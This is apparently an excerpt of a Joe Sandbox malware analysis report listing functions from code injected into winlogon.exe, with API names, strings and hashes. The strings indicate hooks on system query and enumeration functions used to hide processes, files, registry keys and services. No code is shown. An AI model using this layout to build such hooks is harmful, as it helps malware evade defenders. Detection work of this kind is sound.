• Instruction ID: 48e9b6394c2e16e0435a437a14de86af20b7fc3907a494e4619b9524de145d43
• Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
• Instruction Fuzzy Hash: 0A02CA32219B8586EBA1CB55E4903AAB7A0F3D47D5F100125FA9E47BE8DF7CC944CB04

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$AllocQuery
                                                                      • String ID:
                                                                      • API String ID: 31662377-0
                                                                      • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                      • Instruction ID: e020fba28db42efb86b7b281ff6320db8e868d5782e8dd22b64bfe2f8f0cfe4e
                                                                      • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                      • Instruction Fuzzy Hash: 74314132219A8581EAB2DB15E0503AE66A0F3D87D4F500635F9DE46BECDF7DCB509B08

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: 64b7ee1ffacfb3a96812083a67adc2b6f64ddc7d970daca41989523910d28d47
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: 52115E3061060382FBE6AB64E8457F92294A7F43E5F944334BD26825D9EF7DCA449208

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 3733156554-0
                                                                      • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                      • Instruction ID: 4724cafcdfdbfa4d6616eb3151ddc47c4ed22c72909894bd528e3ad7df338f73
                                                                      • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                      • Instruction Fuzzy Hash: CAF03036218B05C0D6B1DB01E4417AA6BA0F7D87F4F140225FE9D43BADCA3CCB848B44

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AllocLibraryLoadVirtual
                                                                      • String ID:
                                                                      • API String ID: 3550616410-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: c04cbf0e898960135302cb09ad6b63cbc2f212c8dd94948b103ddf5d24b099a9
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: 9E61C136F0169287DF958F6590407B9F392FBA4BA4F948231EE69077C8EB38D952C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000001F385BC1628: GetProcessHeap.KERNEL32 ref: 000001F385BC1633
                                                                        • Part of subcall function 000001F385BC1628: HeapAlloc.KERNEL32 ref: 000001F385BC1642
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC16B2
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC16DF
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC16F9
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1719
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1734
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1754
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC176F
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC178F
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC17AA
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC17CA
                                                                      • Sleep.KERNEL32 ref: 000001F385BC1AD7
                                                                      • SleepEx.KERNELBASE ref: 000001F385BC1ADD
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC17E5
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1805
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1820
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1840
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC185B
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC187B
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1896
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC18A0
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: 10bcb2d6682a129b921ec7b08a8e6ea337be82993633d3c01402af06af3f6023
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 8731FF7120164341FFD69B26D6413F953A4ABE4BF0F045631BE3AA73DDEE28CE518614

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: ef4c410e6d960397a7e29bb07b90f3ccf10a3190337873fb1e91f7c74c59de08
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: F061E632B0165187DF958F95A8007B9B392FBA4BE4F948235EE69877C8DA38D952C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 3e014252695f0c00fb7a0bb71849fee8b47a642a1c148055653ae182c2af6344
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 54B1807221065282EF9A9F65C4407F9A3A4F7A5BE4F445226FEA9637D8DF38CE40C344
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: e0b9b7052118a7287e8f390f34dccee8bc25c43afc6201edd398442163f3e76f
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: 43315D72205B818AEBA19F64E8403EE7364F795794F44413AEE5D47B98EF3CCA48C714
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: 119532e0019eb03a6f85644e89c7b11ad2598611322a358013ebae4ac99bf1c6
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: E2310B36214B818ADBA18F25E8403EE63A4F7D97A4F540225FEAD47B99DF3CC6558B00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: 886ad51172aaf13e8012940450bcb762d4a0f855fb16cb69d876ae1c8491be24
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: D5111F32750B0289EF81CF60E8553A833A4F7697A8F441E35EE6D47799DB7CC6988380
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                      • Instruction ID: 0ab57e8a41362360b4c2b69986fe903eab220494ac42150a3405ac5a4fa8be70
                                                                      • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                      • Instruction Fuzzy Hash: AD51C5367006C189FB619B72A8407EA7BA5F7947E4F144225FE6867BDDDA3CCA01C704
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                      • Instruction ID: 6dd60b39cab2d84fa712c6e0a873e69cabff84c93a7a43a81c19e979f1af2cba
                                                                      • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                      • Instruction Fuzzy Hash: 7AF068717152558EEFD98F68A40276977D1F3583D0FD08129EA9A83B48D27C8150CF04

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: b2b3583c4c13428535a8a1f942f546f92154c8786cef82e3cf051c49b1cbc2ed
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: 63515B32200B8686EB95CF62E4483AA77A1F7D9BE9F544234EE5907798DF3CC645CB00

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: d595e3e3372c9b20bd3718418993cbc429e4e82f856070faa9de1b73c2b9a119
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: 9831877414098BA4EE87EFA5E8516F46321A7E43E4F844273BCB9122ED9E7C8B49C354

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 4409f07fb228c0d555485b01c2f5db390ec7bc0f911a69b9524e815b9d6d2938
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 6081AB3160060386FAD39F6594413F966A1ABE57E0FA48235BE25477DEFB3CCB468701

                                                                      Control-flow Graph (rendered as an image; node and edge listing not reproduced)
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: dd5b60a4949fe2c9e32b5ccc5ae674ce106a1ad1d7178672b7aede5bfdb929d8
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: E381903260060387FAD69FA594413F962A0ABE57E0F94A235BD65C77DEDB3CCB458700
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 000001F385BCCE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCEBC
                                                                      • SetLastError.KERNEL32 ref: 000001F385BCCED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,000001F385BCECCC,?,?,?,?,000001F385BCBF9F,?,?,?,?,?,000001F385BC7AB0), ref: 000001F385BCCF2C
                                                                        • Part of subcall function 000001F385BCD6CC: HeapAlloc.KERNEL32 ref: 000001F385BCD721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF54
                                                                        • Part of subcall function 000001F385BCD744: HeapFree.KERNEL32 ref: 000001F385BCD75A
                                                                        • Part of subcall function 000001F385BCD744: GetLastError.KERNEL32 ref: 000001F385BCD764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF76
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: ab4e86b80bad7de7d9fc3ab59b2f76ba8cf21dcb8283221406096f04f5b2af92
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: A9415D3024168786FAEBA73555553F926829BF67F0F280734BD36466EEDE2C9F018608
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: b1f9f93cb01f113d9316950de3058d2bf3c52726d10c2abd083118da5a752f1a
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: 9B213D3261464286EB518B25E4443A963A0F7D9BE4F944325FEA903BE8CF7CC649CB04
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: 89869763d31d70a6664f7afe8390858ba70db1f617f2886a7312f5174378804d
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: BCE1AE32604B4286EBE29B25D4813FD37A1F7E57E8F100225FE6957B99EB38C290C741
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: aaf1cc35d11ae05a2632683eb1bd403c02529057552cc08f6e5be18958e980d5
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: 9BE1A07260474186EBA2DF65D4813ED77A0F7A4BE8F100225FEA957BD9CB38DA81C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: 118cde429f331ccbb9c347859f0b6c357bc9266cc281f8d3d7d51a4fe7ca9d13
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: E4E19E3260474287EBA59FA5D4813ED77A1F7A57E8F100225FE6997B9ECB38C291C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: d636cb6fcfe5ac36cb180e2c1fe7e0ac221cfd02b4f72b76c9f1893fc7a1ecf8
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: E141BF32311A0291EA97CB16A8007F52395FBA5BF0F594375BD2A877CCEA3CCA458308
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: 01501970025b8a16af69953ccfeb273e0ae5138ac2b6fb46539807bede4d7400
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: EA417E32214B85C6E7A1CF61E4443AA77A1F398BD8F548229EE991779CDF3CC945CB00
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD087
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 7b0f6b2b2c262150a3e5074f4c0839de0ecc50569b3260bde6390161f78a9210
